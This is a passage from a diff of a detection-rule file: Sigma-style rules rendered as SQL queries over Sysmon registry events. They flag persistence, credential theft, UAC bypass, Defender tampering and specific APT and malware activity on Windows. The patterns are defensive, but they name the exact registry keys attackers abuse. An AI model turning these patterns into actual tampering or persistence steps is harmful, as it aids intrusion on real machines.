NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" - }, - { - "title": "Persistence Via Hhctrl.ocx", - "id": 
"f10ed525-97fe-4fed-be7c-2feecca941b1", - "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence" + 
"attack.resource_development", + "attack.t1608" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM 
logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' 
ESCAPE '\\')" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", - "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Administrator actions" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD 
(0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' 
OR Details LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { 
- "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1136.001" ], "falsepositives": [ - "Probable legitimate 
applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a 
user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - 
"cve.2021.31979" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution 
Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' 